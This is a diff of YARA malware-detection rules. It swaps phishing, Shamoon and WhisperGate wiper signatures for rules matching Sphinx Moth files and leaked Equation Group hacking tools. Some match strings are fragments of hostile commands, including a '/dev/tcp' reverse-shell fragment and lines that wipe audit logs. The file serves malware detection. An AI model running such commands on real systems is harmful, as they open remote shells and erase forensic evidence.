-		date = "2025-02-14"
-		modified = "2025-03-20"
-		reference = "https://x.com/dtcert/status/1890384162818802135"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_phish_feb25.yar#L1-L14"
+		description = "sphinx moth threat group file kerberos32.dll"
+		author = "Kudelski Security - Nagravision SA (modified by Florian Roth)"
+		id = "769ee362-2363-511a-8f17-99e66c9bab53"
+		date = "2015-08-06"
+		modified = "2023-12-05"
+		reference = "www.kudelskisecurity.com"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sphinx_moth.yar#L61-L85"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "247e6a648bb22d35095ba02ef4af8cfe0a4cdfa25271117414ff2e3a21021886"
-		logic_hash = "144323294a8353956adf7a9b2a316e1e7606e882f85b8187c016d5acdcc254cc"
-		score = 80
+		logic_hash = "5b672c9b9b0ffffd8f243832ea217bfc10b08026c71d297ee1047ca999fb829c"
+		score = 75
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$op1 = { 48 89 EA FF D0 48 89 E9 4C 8D 4C 24 ?? 41 B8 ?? ?? ?? ?? 48 89 C7 48 89 C3 48 89 EA F3 A4 48 89 C1 41 FF D4 31 C9 FF D3}
+		$x1 = "%WINDIR%\\ativpsrz.bin" fullword ascii
+		$x2 = "%WINDIR%\\ativpsrn.bin" fullword ascii
+		$x3 = "kerberos32.dll" fullword wide
+		$x4 = "KERBEROS64.dll" fullword ascii
+		$x5 = "kerberos%d.dll" fullword ascii
+		$s1 = "\\\\.\\pipe\\lsassp" fullword ascii
+		$s2 = "LSASS secure pipe" fullword ascii
+		$s3 = "NullSessionPipes" fullword ascii
+		$s4 = "getlog" fullword ascii
+		$s5 = "startlog" fullword ascii
+		$s6 = "stoplog" fullword ascii
+		$s7 = "Unsupported OS (%d)" fullword ascii
+		$s8 = "Unsupported OS (%s)" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and $op1
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( 2 of ( $x* ) or all of ( $s* ) )
 }
-rule SIGNATURE_BASE_MAL_PHISH_Final_Payload_Feb25
+rule SIGNATURE_BASE_Sphinx_Moth_Kerberos64 : FILE
 {
 	meta:
-		description = "Detects possible final payload of phishing-delivered malware, where embedded shellcode is used to decrypt and execute the payload after user-supplied password input."
-		author = "X__Junior"
-		id = "9014e1f2-09c2-5ba0-8b7c-6ae8c069d1f7"
-		date = "2025-02-14"
-		modified = "2025-03-20"
-		reference = "https://x.com/dtcert/status/1890384162818802135"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_phish_feb25.yar#L16-L35"
+		description = "sphinx moth threat group file kerberos64.dll"
+		author = "Kudelski Security - Nagravision SA (modified by Florian Roth)"
+		id = "5a2487e4-cda4-5d45-9351-edd2b69c460a"
+		date = "2015-08-06"
+		modified = "2023-12-05"
+		reference = "www.kudelskisecurity.com"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sphinx_moth.yar#L87-L104"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "de384aba6b0c6800095eb530954aa718d4ed96cccfc0b1e5e4d01404f3518a77"
-		logic_hash = "3251d68a019d873987966d46c9e474e5a1ebbca4a33a8bf1e3c3ce119db8ab8c"
-		score = 80
+		logic_hash = "13aeb72fcd0f5fd6e73464a90787c756c50569f9eae48945e4ff90d8f9073585"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 
 	strings:
-		$s1 = "%lu: %s %s" wide
-		$s2 = "(Direct Inbound)" wide
-		$s3 = "(Primary Domain)" wide
-		$s4 = "(Forest Tree Root" wide
-		$s5 = "(Native Mode)" wide
-		$s6 = "(In Forest)" wide
-		$s7 = "(None)" wide
+		$s0 = "KERBEROS64.dll" fullword ascii
+		$s1 = "zeSecurityDescriptor" fullword ascii
+		$s2 = "SpGetInfo" fullword ascii
+		$s3 = "SpShutdown" fullword ascii
+		$op0 = { 75 05 e8 6a c7 ff ff 48 8b 1d 47 d6 00 00 33 ff }
+		$op1 = { 48 89 05 0c 2b 01 00 c7 05 e2 29 01 00 09 04 00 }
+		$op2 = { 48 8d 3d e3 ee 00 00 ba 58 }
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 406KB and all of ( $s* ) and 1 of ( $op* )
 }
-rule SIGNATURE_BASE_SUSP_Sysinternals_Desktops_Anomaly_Feb25 : FILE
+rule SIGNATURE_BASE_Sphinx_Moth_Nvcplex : FILE
 {
 	meta:
-		description = "Detects anomalies in Sysinternals Desktops binaries"
-		author = "Florian Roth"
-		id = "5a586222-9263-5079-be48-9cfa464440d4"
-		date = "2025-02-14"
-		modified = "2025-03-20"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_phish_feb25.yar#L37-L60"
+		description = "sphinx moth threat group file nvcplex.dat"
+		author = "Kudelski Security - Nagravision SA"
+		id = "dd1b4071-adf5-5d54-9b4c-877f0965bdc7"
+		date = "2015-08-06"
+		modified = "2023-12-05"
+		reference = "www.kudelskisecurity.com"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sphinx_moth.yar#L106-L120"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "5b8f64e090c7c9012e656c222682dfae7910669c7b7afaca35829cd1cc2eac17"
-		hash = "d0f7f3f58e0dfcfd81235379bb5a236f40be490207d3bf45f190a264879090db"
-		hash = "a83dc4d69a3de72aed4d1933db2ca120657f06adc6683346afbd267b8b7d27d0"
-		hash = "9ebfe694914d337304edded8b6406bd3fbff1d4ee110ef3a8bf95c3fb5de7c38"
-		hash = "9a5b9d89686de129a7b1970d5804f0f174156143ccfcd2cf669451c1ad4ab97e"
-		hash = "ff82c4c679c5486aed2d66a802682245a1e9cd7d6ceb65fa0e7b222f902998e8"
-		hash = "1da91d2570329f9e214f51bc633283f10bd55a145b7b3d254e03175fd86292d9"
-		logic_hash = "e17b831c9644cfe6a4c82537a01cb937007308d94eb2b78f97f5fbad3546404a"
-		score = 70
+		logic_hash = "2f851c0ab8c4a426b00addfbe0da7ceebb08e93014efcb11d64247d14fec909b"
+		score = 75
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = "Software\\Sysinternals\\Desktops" wide fullword
-		$s2 = "Sysinternals Desktops" wide fullword
-		$s3 = "http://www.sysinternals.com" wide fullword
+		$s0 = "mshtaex.exe" fullword wide
+		$op0 = { 41 8b cc 44 89 6c 24 28 48 89 7c 24 20 ff 15 d3 }
+		$op1 = { 48 3b 0d ad 8f 00 00 74 05 e8 ba f5 ff ff 48 8b }
+		$op2 = { 8b ce e8 49 47 00 00 90 8b 43 04 89 05 93 f1 00 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 350KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 214KB and all of them
 }
-rule SIGNATURE_BASE_SUSP_PE_Compromised_Certificate_Feb25 : FILE
+rule SIGNATURE_BASE_Equationgroup_Emptycriss : FILE
 {
 	meta:
-		description = "Detects suspicious PE files signed with a certificate used in a widespread phishing attack in February 2025"
-		author = "Jonathan Peters"
-		id = "2e6ad630-b24e-53b2-8ffe-622c51914568"
-		date = "2025-02-14"
-		modified = "2025-03-20"
-		reference = "https://x.com/DTCERT/status/1890384162818802135"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_phish_feb25.yar#L62-L85"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file emptycriss"
+		author = "Florian Roth (Nextron Systems)"
+		id = "658a0a2c-ea3a-5531-abea-54f0ed786e79"
+		date = "2017-04-08"
+		modified = "2023-12-05"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L15-L30"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "5b8f64e090c7c9012e656c222682dfae7910669c7b7afaca35829cd1cc2eac17"
-		hash = "d0f7f3f58e0dfcfd81235379bb5a236f40be490207d3bf45f190a264879090db"
-		hash = "a83dc4d69a3de72aed4d1933db2ca120657f06adc6683346afbd267b8b7d27d0"
-		hash = "9ebfe694914d337304edded8b6406bd3fbff1d4ee110ef3a8bf95c3fb5de7c38"
-		hash = "9a5b9d89686de129a7b1970d5804f0f174156143ccfcd2cf669451c1ad4ab97e"
-		hash = "ff82c4c679c5486aed2d66a802682245a1e9cd7d6ceb65fa0e7b222f902998e8"
-		hash = "1da91d2570329f9e214f51bc633283f10bd55a145b7b3d254e03175fd86292d9"
-		logic_hash = "8f352ce00bcb64427bef89a9fc180d2451aeb4aa05432881a4754b4fb503c94a"
-		score = 60
+		logic_hash = "fcfbe4a8a959491dfba9e5d958e43221d83a1e49dcf005872a1b71efb1226d99"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "a698d35a0c4d25fd960bd40c1de1022bb0763b77938bf279e91c9330060b0b91"
 
 	strings:
-		$sb1 = { 44 B8 66 73 57 BB 95 65 1D 61 D0 61 }
-		$sb2 = { 4F 23 43 D9 61 54 B9 41 DB 0A 26 B2 }
-		$sb3 = { 40 A3 62 E3 50 68 91 19 F5 2E C3 4C }
+		$s1 = "./emptycriss <target IP>" fullword ascii
+		$s2 = "Cut and paste the following to the telnet prompt:" fullword ascii
+		$s8 = "environ define TTYPROMPT abcdef" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 20MB and 1 of them
+		( filesize < 50KB and 1 of them )
 }
-
-rule SIGNATURE_BASE_Gen_Excel_Xll_Addin_Suspicious : FILE
+rule SIGNATURE_BASE_Equationgroup_Scripme : FILE
 {
 	meta:
-		description = "Detects suspicious XLL add-ins to Excel"
-		author = "@JohnLaTwC"
-		id = "013db759-ab9d-5505-933b-bda702a0941e"
-		date = "2020-10-16"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file scripme"
+		author = "Florian Roth (Nextron Systems)"
+		id = "a2c5cd8b-c104-57d9-9ce2-a0b9a8dd9288"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_excel_xll_addin_suspicious.yar#L3-L64"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L32-L48"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d8c3f00ef05b0b84e4c4d655d01eab6f6e67714619695fd1433726e5a940e530"
-		score = 65
+		logic_hash = "5cffded6563bb3c94868f25e086be8d92837a7656707bf4e6a9e9f375d9ee7e0"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "0bad4e4bc5093dcfc2737c4d8be89d6f093509a7b91a1e022050cb890d90e4e0"
-		hash2 = "133e47eedfede46d1a4529ce7f047e09521ed8c7cad2e49d3522064695bd6c43"
-		hash3 = "1994a39d5639b4eea5c3cdf084a8eacf8610a96702e580d88a6ec18887d0ec6b"
-		hash4 = "28f45d01e397841fcba48da1e61e4927f42ff6fe6f32595c23cf9a953cd2658a"
-		hash5 = "54c3598cf22ad64faeb4e0f9f70e026a1ae834a8c06e5187bf289bb3ee43a8ec"
-		hash6 = "5644a04513744edfb247d0ea83e3e2f7d616d6752cfd1af50e866bb0270131ee"
-		hash7 = "836c0d21fc3ea3a8ce1a493097a5034d110e5c50bfd7e6c3dcb674dc7a6a19ec"
-		hash8 = "b926f7db36bc5bae73091c783b0715d2af051de22a579548adf2498cb1a1d075"
-		hash9 = "6ba100a5da5efea14a5ca929628b732a6e6b8ab8f78167db35343e895997ce52"
-		hasha = "ee603cbd6187850334ae5d8adcf029d5cde710fc966b2b7a2c95249d3b23d693"
-		hashb = "99195679e998407fd4d606a0d956bda99f79625b638c63f90d9d399c6f2a143e"
-		hashc = "99534c7086128998ae39967fe5fc6bf526cb2ba5d3b2e99dc7bd03833e4a94ae"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "a1adf1c1caad96e7b7fd92cbf419c4cfa13214e66497c9e46ec274a487cd098a"
 
 	strings:
-		$s1 = "CryptStringToBinaryA"
-		$s2 = "NtQueueApcThread"
-		$cs1 = "dsrole.dll"
-		$cs2 = "user32.dll"
-		$debug = "SeDebugPrivilege"
+		$x1 = "running \\\"tcpdump -n -n\\\", on the environment variable \\$INTERFACE, scripted" fullword ascii
+		$x2 = "Cannot read $opetc/scripme.override -- are you root?" ascii
+		$x3 = "$ENV{EXPLOIT_SCRIPME}" ascii
+		$x4 = "$opetc/scripme.override" ascii
 
 	condition:
-		filesize < 1MB and uint16( 0 ) == 0x5a4d and pe.characteristics & pe.DLL and pe.exports ( "xlAutoOpen" ) and ( ( ( pe.imports ( "KERNEL32.dll" , "LookupPrivilegeValueW" ) or pe.imports ( "KERNEL32.dll" , "LookupPrivilegeValueA" ) ) and pe.imports ( "KERNEL32.dll" , "AdjustTokenPrivileges" ) and pe.imports ( "KERNEL32.dll" , "OpenProcess" ) and $debug ) or ( pe.imports ( "ADVAPI32.dll" , "CryptDecrypt" ) and pe.imports ( "ADVAPI32.dll" , "CryptImportKey" ) ) or ( pe.imports ( "DNSAPI.dll" , "DnsQuery_A" ) or pe.imports ( "DNSAPI.dll" , "DnsQuery_W" ) ) or ( ( pe.imports ( "KERNEL32.dll" , "FindResourceA" ) or pe.imports ( "KERNEL32.dll" , "FindResourceW" ) ) and pe.imports ( "KERNEL32.dll" , "LoadResource" ) and pe.imports ( "KERNEL32.dll" , "LockResource" ) and ( pe.imports ( "KERNEL32.dll" , "VirtualAlloc" ) or pe.imports ( "KERNEL32.dll" , "VirtualAllocEx" ) ) and pe.imports ( "KERNEL32.dll" , "WriteProcessMemory" ) and pe.imports ( "KERNEL32.dll" , "SetThreadContext" ) ) or ( pe.imports ( "KERNEL32.dll" , "GetThreadContext" ) and pe.imports ( "KERNEL32.dll" , "VirtualAllocEx" ) and pe.imports ( "KERNEL32.dll" , "ResumeThread" ) and pe.imports ( "KERNEL32.dll" , "SetThreadContext" ) ) or ( pe.imports ( "KERNEL32.dll" , "WinExec" ) ) or ( all of ( $s* ) ) or ( all of ( $cs* ) and pe.imports ( "KERNEL32.dll" , "VirtualAllocEx" ) and pe.imports ( "KERNEL32.dll" , "TerminateProcess" ) and pe.imports ( "KERNEL32.dll" , "Sleep" ) ) )
+		( filesize < 30KB and 1 of them )
 }
-rule SIGNATURE_BASE_Crowdstrike_Shamoon_Droppedfile
+rule SIGNATURE_BASE_Equationgroup_Crypttool : FILE
 {
 	meta:
-		description = "Rule to detect Shamoon malware http://goo.gl/QTxohN"
-		author = "Florian Roth"
-		id = "b350f1b1-db73-574b-957b-34e5a84f68b0"
-		date = "2023-12-05"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file cryptTool"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e1f4e010-9c42-5b8a-8feb-2885b99307fe"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "http://www.rsaconference.com/writable/presentations/file_upload/exp-w01-hacking-exposed-day-of-destruction.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_shamoon.yar#L1-L13"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L50-L64"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ed550832b217f7edceea2edf7c4453925ed1759d97db7728f7face6ff10ee361"
+		logic_hash = "ae2d5eda038326376511450e1f5bd2bbf6264d23df013b005b322d70eb6266a0"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "96947ad30a2ab15ca5ef53ba8969b9d9a89c48a403e8b22dd5698145ac6695d2"
 
 	strings:
-		$testn123 = "test123" wide
-		$testn456 = "test456" wide
-		$testn789 = "test789" wide
-		$testdomain = "testdomain.com" wide
-		$pingcmd = "ping -n 30 127.0.0.1 >nul" wide
+		$s1 = "The encryption key is " fullword ascii
+		$s2 = "___tempFile2.out" ascii
 
 	condition:
-		( any of ( $testn* ) or $pingcmd ) and $testdomain
+		( uint16( 0 ) == 0x457f and filesize < 200KB and all of them )
 }
-rule SIGNATURE_BASE_APT_HKTL_Wiper_Whispergate_Jan22_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Dumppoppy : FILE
 {
 	meta:
-		description = "Detects unknown wiper malware"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file dumppoppy"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f04b619e-1df2-5c51-9cab-4a0fffd1c042"
-		date = "2022-01-16"
+		id = "c316aac3-bdd7-5187-8ae2-0a87c2f2d26f"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ua_wiper_whispergate.yar#L2-L23"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L66-L82"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "72eb50a70b3f2fbb232134ef4706dbb15bdb5893fe06d899bff3b7aacdfadd30"
-		score = 85
+		logic_hash = "b6fb6a3799196375796da6f3a0169246145e668019dd692da67ca6f06d09c3dc"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "a196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "4a5c01590063c78d03c092570b3206fde211daaa885caac2ab0d42051d4fc719"
 
 	strings:
-		$xc1 = { 41 41 41 41 41 00 59 6F 75 72 20 68 61 72 64 20
-               64 72 69 76 65 20 68 61 73 20 62 65 65 6E 20 63
-               6F 72 72 75 70 74 65 64 }
-		$op1 = { 89 34 24 e8 3f ff ff ff 50 8d 65 f4 31 c0 59 5e 5f }
-		$op2 = { 8d bd e8 df ff ff e8 04 de ff ff b9 00 08 00 00 f3 a5 c7 44 24 18 00 00 00 00 c7 44 24 14 00 00 00 00 c7 44 24 10 03 00 00 00 c7 44 24 0c 00 00 00 00 }
-		$op3 = { c7 44 24 0c 00 00 00 00 c7 44 24 08 00 02 00 00 89 44 24 04 e8 aa fe ff ff 83 ec 14 89 34 24 e8 3f ff ff ff 50 }
+		$x1 = "Unless the -c (clobber) option is used, if two RETR commands of the" fullword ascii
+		$x2 = "mywarn(\"End of $destfile determined by \\\"^Connection closed by foreign host\\\"\")" fullword ascii
+		$l1 = "End of $destfile determined by \"^Connection closed by foreign host"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( 1 of ( $x* ) or 2 of them ) or all of them
+		( filesize < 20KB and 1 of them )
 }
-rule SIGNATURE_BASE_APT_HKTL_Wiper_Whispergate_Jan22_2 : FILE
+rule SIGNATURE_BASE_Equationgroup_Auditcleaner : FILE
 {
 	meta:
-		description = "Detects unknown wiper malware"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file Auditcleaner"
 		author = "Florian Roth (Nextron Systems)"
-		id = "822e5af5-9c51-5be3-94f1-7e0a714743e6"
-		date = "2022-01-16"
+		id = "39ed798a-221d-5a4b-8809-db01d5241418"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ua_wiper_whispergate.yar#L25-L57"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L84-L102"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "87a03e95bc1c33d1b3343ec7369c516bb15791943fbb122de11867ad4bddd565"
-		score = 90
+		logic_hash = "30a6ae9ce7d02c1d945d57eabf29f430ad4cdbc48dba5fe71654efc2c59fde08"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "8c172a60fa9e50f0df493bf5baeb7cc311baef327431526c47114335e0097626"
 
 	strings:
-		$sc1 = { 70 00 6F 00 77 00 65 00 72 00 73 00 68 00 65 00
-               6C 00 6C 00 00 27 2D 00 65 00 6E 00 63 00 20 00
-               55 00 77 00 42 00 30 00 41 00 47 00 45 00 41 00
-               63 00 67 00 42 00 30 00 41 00 43 }
-		$sc2 = { 59 00 6C 00 66 00 77 00 64 00 77 00 67 00 6D 00
-               70 00 69 00 6C 00 7A 00 79 00 61 00 70 00 68 }
-		$s1 = "xownxloxadDxatxxax" wide
-		$s2 = "0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==" wide
-		$s3 = "https://cdn.discordapp.com/attachments/" wide
-		$s4 = "fffxfff.fff" ascii fullword
-		$op1 = { 20 6b 85 b9 03 20 14 19 91 52 61 65 20 e1 ae f1 }
-		$op2 = { aa ae 74 20 d9 7c 71 04 59 20 71 cc 13 91 61 20 97 3c 2a c0 }
-		$op3 = { 38 9c f3 ff ff 20 f2 96 4d e9 20 5d ae d9 ce 58 20 4f 45 27 }
-		$op4 = { d4 67 d4 61 80 1c 00 00 04 38 35 02 00 00 20 27 c0 db 56 65 20 3d eb 24 de 61 }
+		$x1 = "> /var/log/audit/audit.log; rm -f ." ascii
+		$x2 = "Pastables to run on target:" ascii
+		$x3 = "cp /var/log/audit/audit.log .tmp" ascii
+		$l1 = "Here is the first good cron session from" fullword ascii
+		$l2 = "No need to clean LOGIN lines." fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and 5 of them or 7 of them
+		( filesize < 300KB and 1 of them )
 }
-rule SIGNATURE_BASE_APT_HKTL_Wiper_Whispergate_Stage3_Jan22 : FILE
+rule SIGNATURE_BASE_Equationgroup_Reverse_Shell : FILE
 {
 	meta:
-		description = "Detects reversed stage3 related to Ukrainian wiper malware"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file reverse.shell.script"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d5d562cd-03ef-5450-8044-3f538cea32d0"
-		date = "2022-01-16"
+		id = "0e9b8ff2-2187-5b61-a086-2ad4ff1a3b10"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/juanandres_gs/status/1482827018404257792"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ua_wiper_whispergate.yar#L59-L74"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L104-L118"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b06536b6a6eebd5fb398ba2617bf68a5b2c4b0035766b3cd0fc03d95019891ec"
+		logic_hash = "6dc388fecbf606b19c04626d64f5fe4184f07c2a1597a6f8337aa4a827b2d89b"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "9ef7dbd3da51332a78eff19146d21c82957821e464e8133e9594a07d716d892d"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "d29aa24e6fb9e3b3d007847e1630635d6c70186a36c4ab95268d28aa12896826"
 
 	strings:
-		$xc1 = { 65 31 63 70 00 31 79 72 61 72 62 69 4c 73 73 61 6c 43 00 6e 69 61 4d }
-		$s1 = "lld." wide
+		$s1 = "sh >/dev/tcp/" ascii
+		$s2 = " <&1 2>&1" fullword ascii
 
 	condition:
-		uint16( filesize -2 ) == 0x4d5a and filesize < 5000KB and all of them
+		( filesize < 1KB and all of them )
 }
-rule SIGNATURE_BASE_MAL_OBFUSC_Unknown_Jan22_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Tnmunger : FILE
 {
 	meta:
-		description = "Detects samples similar to reversed stage3 found in Ukrainian wiper incident named WhisperGate"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file tnmunger"
 		author = "Florian Roth (Nextron Systems)"
-		id = "647c0092-b03d-5627-8568-ddaa982c73a1"
-		date = "2022-01-16"
+		id = "c95dd24f-ffc9-5e58-aed7-205daa001b8c"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/juanandres_gs/status/1482827018404257792"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ua_wiper_whispergate.yar#L76-L101"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L120-L134"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "26a295d3b78c3a33d776a648aa0f410ac7cb5021ad9d3b294ff9629d6ba7132a"
+		logic_hash = "ddb957ca9350288d0fa98ba20847a99dcba931b5a03d0ae94cd3409f82f728eb"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "9ef7dbd3da51332a78eff19146d21c82957821e464e8133e9594a07d716d892d"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "1ab985d84871c54d36ba4d2abd9168c2a468f1ba06994459db06be13ee3ae0d2"
 
 	strings:
-		$xc1 = { 37 00 63 00 38 00 63 00 62 00 35 00 35 00 39 00
-               38 00 65 00 37 00 32 00 34 00 64 00 33 00 34 00
-               33 00 38 00 34 00 63 00 63 00 65 00 37 00 34 00
-               30 00 32 00 62 00 31 00 31 00 66 00 30 00 65 }
-		$xc2 = { 4D 61 69 6E 00 43 6C 61 73 73 4C 69 62 72 61 72
-               79 31 00 70 63 31 65 }
-		$s1 = ".dll" wide
-		$s2 = "%&%,%s%" ascii fullword
-		$op1 = { a2 87 fa b1 44 a5 f5 12 da a7 49 11 5c 8c 26 d4 75 }
-		$op2 = { d7 af 52 38 c7 47 95 c8 0e 88 f3 d5 0b }
-		$op3 = { 6c 05 df d6 b8 ac 11 f2 67 16 cb b7 34 4d b6 91 }
+		$s1 = "TEST: mungedport=%6d  pp=%d  unmunged=%6d" fullword ascii
+		$s2 = "mungedport=%6d  pp=%d  unmunged=%6d" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 1 of ( $x* ) or 3 of them )
+		( uint16( 0 ) == 0x457f and filesize < 10KB and 1 of them )
 }
-rule SIGNATURE_BASE_MAL_Unknown_Discord_Characteristics_Jan22_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Ys_Ratload : FILE
 {
 	meta:
-		description = "Detects unknown malware with a few indicators also found in Wiper malware"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file ys.ratload.sh"
 		author = "Florian Roth (Nextron Systems)"
-		id = "23ee5319-6a72-517b-8ea0-55063b6b862c"
-		date = "2022-01-16"
+		id = "abd120e7-23f8-530e-b21e-c50a2b571332"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ua_wiper_whispergate.yar#L103-L119"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L136-L151"
